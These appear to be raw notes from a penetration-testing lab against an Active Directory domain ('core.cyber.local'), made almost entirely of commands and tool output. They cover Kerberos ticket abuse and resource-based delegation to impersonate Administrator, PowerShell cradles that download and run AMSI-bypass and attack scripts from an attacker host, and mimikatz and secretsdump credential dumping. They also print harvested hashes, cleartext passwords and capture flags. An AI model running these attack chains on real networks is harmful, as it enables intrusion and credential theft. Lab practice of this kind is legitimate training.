xz5+FpY7eEQK3R0MS69WuznlWl/beJasQZ7DV0H46dpKd4T4Qnz8n77pdArX6vabpVGv+qbDqUYx5EWecJUPpyodjYEK5BhzSnrhY6KvhUU3hkafpakvOkPPQHBhibshNMTbsEsdyFUmndUquWsSDGbAnUHvsxM37REHRqqh7STjc0hgc2S+z9Jv5FlyUk3p3ZNyBB9oi34m4okWpR+nPqs66BWqaR22uG45ArXd9GSQ4M59c1LvT0YH7/jni8co5J2c04e9/t0iZ7rWUErcFQen6F7w+xXKJ+egH05Nbta8jVegNfQxxPlWJZ3TJ3hr2lP7ZUxS5SusfuSSJcvSc5asftHW1lLEJHy/v8ClzyXbSPMbzNh2tjQKuw4H5gA+LtSGwhg0N3QqkYHmuDs0uIEQFxmmHrngG+h/MVmh8ZHtbT4xDNvN1L8wR3K7d018b4rtyDGgWJQ8Kre2ZPVYSfm+tVoPFEUsD6OB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIN5eNdPcZOcj8wIcQKkKc6a3i9Bgn0/r9nPjvdpY6r6boQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNDAyMDkwMTAwMDFaphEYDzIwMjQwMjA5MTEwMDAxWqcRGA8yMDI0MDIxNjAxMDAwMVqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw= /nowrap /ptt
┌──(myimpacket)─(jay㉿localhost)-[~/prolabs/RubeusToCcache]
└─$ rbcd.py -delegate-from 'COREWKT001$' -delegate-to 'COREWKT002$' -action 'write' 'core.cyber.local/ilene.rasch' -k -no-pass
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] COREWKT001$ can now impersonate users on COREWKT002$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] corewkt001$ (S-1-5-21-1559563558-3652093953-1250159885-1396)
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
./rubeustoccache.py doIFQDCCBTygAwIBBaEDAgEWooIENjCCBDJhggQuMIIEKqADAgEFoRIbEENPUkUuQ1lCRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUyjggPmMIID4qADAgESoQMCAQWiggPUBIID0EVlP3QA75j2WjTUU3XlY3ymXBToBHe9y4aRj95tNfQ00VR9Kut4nEBXjUkFIQKcKhEuJU5HPEYaC9WDDWdi7OgqmRTAxguyFqaiPse5sSspZt0p+bg+gxsMNi9h85obOlL+s6ASGFjapsuuP/5eYEyk2JH0PGb9dt9h1uwun6wb3juP1/0kKePT5n7QeDlZqiFPJzg8hOqESiN2sRfQJp43ul4ih0sRpZCZ02m51zIybmT6N1zrwMHEpv0O+tAJ50ykTYQa0RdB21/6+xxiBrjqiTD454ZmFsHYqaPxomcEATL5ypGa80lHYiUOxpG+IB4x/C2vDsGKXUlXv8ykGjOiBQDFyVGuUx73lNG80VMX5DzVD2iBMsy61vIFwpl9Y1XBNspWwwWABjN8Ybw1dYuQfQ7MwuWviudBGaC4vgV8BK2e/55JEqkh+udQjzmFeBNOMeDJV5exCN7EkTJ1YnpGKK4thgAyDYMS4387qnzqzZuF0/OYLErXd9Q25r2ML8w505xVeTTuTHHQkRdoLYhZhkfIlEAFphYIk0CbgshiAmorI8pq6Eg0wDJfN3XVf+n6xpkv/0kS8ZQiSgETdSsAgYKM0bWufUZZItC515wW8kAOjebGHdhfMqBV6t6drGXnDDcokBICOJnWC8CUIeDnzBT1G3Qfx/R4mpmXmdynBqxgwUcl5ivbdklqg6soR28Hjv6vxhb3M4aXeSa4Ti9anQiBrfEwuDa+ZprPfqtBHpoz2OJ7L9pYEp2P4JEYZrLhJMLOkcXH35kGVY8L7ZMmgyCizhmGvs5fCC0l/Y0PsKAdI/prGxrfnwCmbUH8g6p9nu2wJlFWVhAvbcyuNvrRIdQd3IEAS9S3CeWN2Gk33BP6rlIOQ5gvR3sdQQrurcqlv/+fbZezkGc7Bp8Qufh9MTaLWiDarSaSsVzcz8A7wAVvGiO4gzQ4AkJqPHMvjhmigKzBqWbNgfxXEKDE6fnwBksjHMoNVSHqmh92e7k0gLg6Uj+66U/z2gDEGaRsAAMAzZHFeu40LApkmHvPYYSsZGN7yHyDt86TpJ2xypL/+a52fgcTkxQTteyZjcMJ/So3eBc8Kwz7t+IB/GYo5Nr1ZoBJcXk0L3XH91RtFmsICHYp6laz8Qh/5j8r9xRQYbJrTlkn2wbZnRc6JmkpQy5/wiZNd6qTJgrsuqmOisrbSpIMWvYl0pwO7xfNDYQXTSNAhTFA7ruCaNrK8ECerMqvGxEwgHR+4WWHLIyB1HbD5rewJ0L3nkgBYFUVE6cXgZdp07ha8R5h/PXOem8EI8mjgfUwgfKgAwIBAKKB6gSB532B5DCB4aCB3jCB2zCB2KArMCmgAwIBEqEiBCA+qYk0BwUHvGIZ+Td9GDT+VDX+8/p/2didWM8uJealyqESGxBDT1JFLkNZQkVSLkxPQ0FMohgwFqADAgEBoQ8wDRsLY29yZXdrdDAwMSSjBwMFAGChAAClERgPMjAyNDAzMDIwMDE5MThaphEYDzIwMjQwMzAyMTAxNTM3WqcRGA8yMDI0MDMwODE0MzAzOFqoEhsQQ09SRS5DWUJFUi5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQQ09SRS5DWUJFUi5MT0NBTA== corewkt001.kribi corewkt001.ccache
export KRB5CCNAME=corewkt001.ccache
getST.py -spn 'cifs/COREWKT002' -impersonate 'Administrator' 'core.cyber.local/COREWKT001$' -k -no-pass```
export KRB5CCNAME=Administrator.ccache
cme smb '10.9.15.201' -u Administrator --use-kcache --sam
SMB 10.9.15.201 445 COREWKT002 [*] Dumping SAM hashes
SMB 10.9.15.201 445 COREWKT002 Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d369b6024558b73ce74c305f24ac984:::
SMB 10.9.15.201 445 COREWKT002 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.15.201 445 COREWKT002 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.15.201 445 COREWKT002 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:954fd25162ffdda445dca6edec93b934:::
SMB 10.9.15.201 445 COREWKT002 [+] Added 4 SAM hashes to the database
Worked
cme smb '10.9.15.201' -u Administrator --use-kcache -x "powershell.exe -noexit -ep bypass -c IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.15.207/large1.ps1'))"
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX
getsystem
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Not again steven
Cyb3rN3t1C5{CR3@t0rS!D}
Post-exp
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/test3.ps1");
test-wave -Command '"token::elevate" "privilege::debug" "lsadump::secrets"'
mimikatz(powershell) # lsadump::secrets
Domain : COREWKT002
SysKey : 5dd8c2773925b89651e9f48ebdf8d46c
Local name : COREWKT002 ( S-1-5-21-2266124114-256719172-1478668774 )
Domain name : core ( S-1-5-21-1559563558-3652093953-1250159885 )
Domain FQDN : core.cyber.local
Policy subsystem is : 1.18
LSA Key(s) : 1, default {d41a4f61-828e-cd3f-4165-8f0a0473a25e}
[00] {d41a4f61-828e-cd3f-4165-8f0a0473a25e} c5f66ce25a07afd2155b7692bb7751266906233b3e1d3e674154dd9d580d0347
Secret : $MACHINE.ACC
cur/text: 0DlRYa42*7Ao)_#=FiBaj#NMD0M5;TUSB,h#[:]nk,+a/u=eTVex"Kmn"WTz0d*,l"r9wetIka%lej(6jSWbJJu*VlhJW[bCX .T^/a;WxB9D;^9HbQgu^wn
NTLM:99f7ed190a27e3963249b3e0e14c3194
SHA1:69bd6440eb8dc905ffd4f6c382968f284489e787
old/text: 0DlRYa42*7Ao)_#=FiBaj#NMD0M5;TUSB,h#[:]nk,+a/u=eTVex"Kmn"WTz0d*,l"r9wetIka%lej(6jSWbJJu*VlhJW[bCX .T^/a;WxB9D;^9HbQgu^wn
NTLM:99f7ed190a27e3963249b3e0e14c3194
SHA1:69bd6440eb8dc905ffd4f6c382968f284489e787
Secret : CachedDefaultPassword
old/text: 6IVx7cxECM6m57WVjrqfH1gvluKnvN
Secret : DefaultPassword
cur/text: zui4uaS8oeng
test-wave -Command '"token::elevate" "privilege::debug" "lsadump::sam"'
mimikatz(powershell) # lsadump::sam
Domain : COREWKT002
SysKey : 5dd8c2773925b89651e9f48ebdf8d46c
Local SID : S-1-5-21-2266124114-256719172-1478668774
SAMKey : bd2bb9c4a2aff5c6874f16c8ef83fcd7
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3d369b6024558b73ce74c305f24ac984
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 81c53c6ef5fbebe3e9cb1324ed9d6aa4
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT002.CORE.CYBER.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 001ff6d7bc10726a07cda615785fd4ec7f9b88d2f642539863ca823e99c1cd75
aes128_hmac (4096) : 12b60ce38236dece8e6abe1726085fd4
des_cbc_md5 (4096) : b53bfb687acebaf4
OldCredentials
aes256_hmac (4096) : c168b8fa882a3ed251a468998cca52994124a40117fbe5c1196c6754e47bbf10
aes128_hmac (4096) : 4c062b8eeb24fcfeec7c43fa1b8c81a0
des_cbc_md5 (4096) : 6ddf08ab1340926b
OlderCredentials
aes256_hmac (4096) : 6e5bcdb4a3141e96a94987367aef6166233bd9b146896e0b77c26e5c190496b2
aes128_hmac (4096) : bdf73a8d963578dd5431e955067439e3
des_cbc_md5 (4096) : 802962c21f51cdc7
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT002.CORE.CYBER.LOCALAdministrator
Credentials
des_cbc_md5 : b53bfb687acebaf4
OldCredentials
des_cbc_md5 : 6ddf08ab1340926b
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
After checking all the ip the interesting one
cme smb 10.9.10.18 -u 'steven.sanchez' -p 'zui4uaS8oeng' -d core.cyber.local
smbclient.py 'core.cyber.local/steven.sanchez:zui4uaS8oeng@10.9.10.18'
use C$
cd Users
# cat flag.txt
Cyb3rN3t1C5{RD$_U$3r_$h3ll}
THe Great Escape
cd Users\Administrator
cat flag.txt
Cyb3rN3t1C5{RD$_App$_Br3ak0ut$}
Out of Control
secretsdump.py 'core.cyber.local/steven.sanchez:zui4uaS8oeng@10.9.10.18'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0532f61bcad8090e9a8d4600fb26d83b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2567ea2192cc2288bebe0f13565252b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:86326d3ce61a1321d2dbcfdf8a068073:::
[*] Dumping cached domain logon information (domain/username:hash)
CYBER.LOCAL/Administrator:$DCC2$10240#Administrator#c145dcbd844f88264bdd35aafd17500f
CORE.CYBER.LOCAL/George.Wirth:$DCC2$10240#George.Wirth#b4357cc36acd90e5bdc6a185b0ad9289
CORE.CYBER.LOCAL/Steven.Sanchez:$DCC2$10240#Steven.Sanchez#25f4b45a2fb7112ce6cd5d12dccabbc4
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CYBER\CYAPP$:aes256-cts-hmac-sha1-96:2db070d2cbde140fdc612b267727c96ee0fc1b6e0ee2bf7aa13afbfd0af60d24
CYBER\CYAPP$:aes128-cts-hmac-sha1-96:2c9c0d26bae1353572ccd887bed4ec0a
CYBER\CYAPP$:des-cbc-md5:97d5f41f700e43c1
CYBER\CYAPP$:plain_password_hex:24003b00370023006b0038005d002e0065003a006f005b0041005800320056006e0073004b007000330027003c004e0042005a006400430020002e0040007500530030007100510062006900670048002d0075003c006a0024006d002000790075002c007a0032002a005f0024005d003200780059006800770048006a0058005200700053005b004100620030003a005b00560044007a006b0046004100660058006e00420058005000230034007300470071006100780040006300410047002000530020006100540031004300490043002000490044004a0069003e0042005d00380056006b00490037005a002200
CYBER\CYAPP$:aad3b435b51404eeaad3b435b51404ee:f787cd99b54ab0d05cbba3624199abd0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x8913f82198236b0a6e4e6bcdb8893c178ea75e8e
dpapi_userkey:0xb6cfc82ef9a565ec90399c92a31caf6303d41ac2
[*] NL$KM
0000 5C 28 CD 7A 10 67 40 04 8F 19 94 8A 2A EE 9C 0A \(.z.g@.....*...
0010 8D F2 A8 E2 C7 4F 32 3D 3F 07 5A 25 05 7F C9 6B .....O2=?.Z%...k
0020 E8 90 54 60 E3 92 DC D5 70 E6 5E 3F C4 9B 0B DE ..T`....p.^?....
0030 15 EB 47 0B E0 01 86 8C 64 D5 22 09 38 27 5A 49 ..G.....d.".8'ZI
NL$KM:5c28cd7a106740048f19948a2aee9c0a8df2a8e2c74f323d3f075a25057fc96be8905460e392dcd570e65e3fc49b0bde15eb470be001868c64d5220938275a49
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Corewebtw
cme winrm 10.9.15.0/24 -u 'steven.sanchez' -p 'zui4uaS8oeng'
evil-winrm -i 10.9.15.12 -u 'steven.sanchez' -p 'zui4uaS8oeng'
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX
<user username="tomcat" password="y4mEcAmk!%9j" roles="manager-gui" />
Now the tomcat exploit with juicy potato to get the curiosity flag in C:\Users\Administrator\flag.txt